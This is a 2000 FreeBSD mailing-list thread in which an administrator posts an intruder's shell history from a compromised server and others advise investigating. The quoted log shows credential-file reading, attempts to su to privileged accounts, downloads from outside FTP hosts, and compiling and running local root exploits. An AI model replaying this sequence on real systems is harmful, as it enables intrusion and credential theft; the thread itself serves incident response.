From owner-freebsd-questions Mon Dec 18 13:14:42 2000 From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 13:14:36 2000 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from borg.starbase.net (unknown [208.233.101.2]) by hub.freebsd.org (Postfix) with ESMTP id 3379D37B69C for ; Mon, 18 Dec 2000 13:14:34 -0800 (PST) Received: from localhost (alex@localhost) by borg.starbase.net (8.9.3/8.8.8) with ESMTP id QAA23756; Mon, 18 Dec 2000 16:14:21 -0500 (EST) Date: Mon, 18 Dec 2000 16:14:20 -0500 (EST) From: Alexander V P X-Sender: alex@borg.starbase.net To: Joe Oliveiro Cc: "Gerald T. Freymann" , Questions Subject: Re: Hacker history file - OUCH In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG hi, nothing wrong with that as far as i'm concern. we ( freebsd community) don't have that many breakings and every one needs to be investigated. personally i would do that and post somewhere results, so tomorrow (less expirienced, fortunate etc) admins can read about it. after all i'll wipe that box anyway ;-). it takes a lotsa guts to post on freebsd mailing list ( or anywhere for that matter) something like this. alex On Mon, 18 Dec 2000, Joe Oliveiro wrote: > i like wiping the box! > > Microsoft: "Where would you like to go to today" > Linux: "Where would you like to go tomorrow" > FreeBSD: "Hey,when are you guys going to catch up" > > > On Mon, 18 Dec 2000, Alexander V P wrote: > > > hi, > > do you keep/have logs about what ftp transfers he did? > > did you send mail to root@he.net, or .mx domain? > > any idea how he break in? what freebsd you're using? > > if i'm on your place, i'll unplug the box and try to find out more about > > this. don't do like most of the sysadmins that just wipe the box. > > alex > > > > On Mon, 18 Dec 2000, Gerald T. Freymann wrote: > > > > > > > > > > > Seems we have an intruder on one of our boxes... the .history file from the > > > troubled account follows: > > > > > > cd bnc > > > ls > > > ./bash > > > who > > > cd /etc > > > more passwd > > > ps -l > > > ls -l > > > more pwd.db > > > more hosts > > > pico adduser.conf.bak > > > pico group > > > su user > > > pico group.bak > > > pico ftpuser > > > O > > > pico ftpusers > > > su toor > > > su operator > > > id > > > pico spwd.db > > > su wheel > > > pico passwd > > > cd /var/tmp > > > ls -a > > > cd ... > > > ls -a > > > cd .. > > > ls -l > > > ls -al > > > cd ... > > > ftp copper.he.net > > > chmod u+x xcon > > > ./xcon > > > id > > > rm * > > > ls > > > who > > > cd /var/tmp > > > ls -a > > > ls -al > > > cd ... > > > ls -a > > > ftp cih.edu.mx > > > ls > > > cc bsd1 bsd-cron.c > > > cc -o bsd1 bsd-cron.c > > > ./bsd1 > > > id > > > cc -o bsd2 bsd2.c > > > ./bsd2 > > > id > > > ls > > > ftp cih.edu.mx > > > ./bsd sh > > > ./bsd.sh > > > chmod u+x bsd.sh > > > ./bsd.sh > > > /tmp/sh > > > id > > > ls > > > cc -o bsdsmail bsdsmail.c > > > ./bsdsmail > > > ls -a > > > pico hack > > > ls > > > pico user.inf > > > ls > > > id > > > rm * > > > exit > > > > > > Anybody recognize what the intruder has set up? > > > > > > -Gerry > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message